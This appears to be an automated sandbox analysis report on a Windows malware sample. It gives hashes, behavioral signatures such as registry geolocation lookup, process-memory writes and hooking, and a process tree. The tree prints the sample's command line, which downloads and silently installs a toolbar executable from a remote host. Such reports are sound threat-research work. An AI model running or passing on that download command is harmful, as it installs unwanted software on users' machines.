Analysis
-
max time kernel
135s -
max time network
136s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
10-07-2024 05:11
Static task
static1
Behavioral task
behavioral1
Sample
336b0f754da1561b5296a4bf08b823d9_JaffaCakes118.exe
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
336b0f754da1561b5296a4bf08b823d9_JaffaCakes118.exe
Resource
win10v2004-20240709-en
General
-
Target
336b0f754da1561b5296a4bf08b823d9_JaffaCakes118.exe
-
Size
448KB
-
MD5
336b0f754da1561b5296a4bf08b823d9
-
SHA1
6994319176a4c80771cb4d94703f1b668873f96b
-
SHA256
15dee862c15036d51e2530ed399803a775ff1dff19eca7adb4a99f3a843805f5
-
SHA512
dfaab394701c3047ed96df9189219bca4fec6dcc5992ae4abf8a7c00e47dbbd5ac08cb03a069f9e9d570a11d4f3b871ebb2ca40ab3ef845b3a6cda47eed64677
-
SSDEEP
6144:ebheGnUYhPsK9OfBSfk+1OIWi+vQVFB9SnXyqAaWcl578TJ5kvj9Lgptj6:mheGnbsKEo1O0j4yqcclWT2
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation 336b0f754da1561b5296a4bf08b823d9_JaffaCakes118.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of SetWindowsHookEx 4 IoCs
pid Process 3444 336b0f754da1561b5296a4bf08b823d9_JaffaCakes118.exe 3444 336b0f754da1561b5296a4bf08b823d9_JaffaCakes118.exe 1924 336b0f754da1561b5296a4bf08b823d9_JaffaCakes118.exe 1924 336b0f754da1561b5296a4bf08b823d9_JaffaCakes118.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 3444 wrote to memory of 1924 3444 336b0f754da1561b5296a4bf08b823d9_JaffaCakes118.exe 85 PID 3444 wrote to memory of 1924 3444 336b0f754da1561b5296a4bf08b823d9_JaffaCakes118.exe 85 PID 3444 wrote to memory of 1924 3444 336b0f754da1561b5296a4bf08b823d9_JaffaCakes118.exe 85
Processes
-
C:\Users\Admin\AppData\Local\Temp\336b0f754da1561b5296a4bf08b823d9_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\336b0f754da1561b5296a4bf08b823d9_JaffaCakes118.exe"1⤵
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3444 -
C:\Users\Admin\AppData\Local\Temp\336b0f754da1561b5296a4bf08b823d9_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\336b0f754da1561b5296a4bf08b823d9_JaffaCakes118.exe" /P"C:\Users\Admin\AppData\Local\Temp\WS_ABP_setup.exe" /U"http:\\fs2.softwaredownloadupdates.com\ou2\WS_ABP_setup.exe" /CToolbar Install /S /N2⤵
- Suspicious use of SetWindowsHookEx
PID:1924
-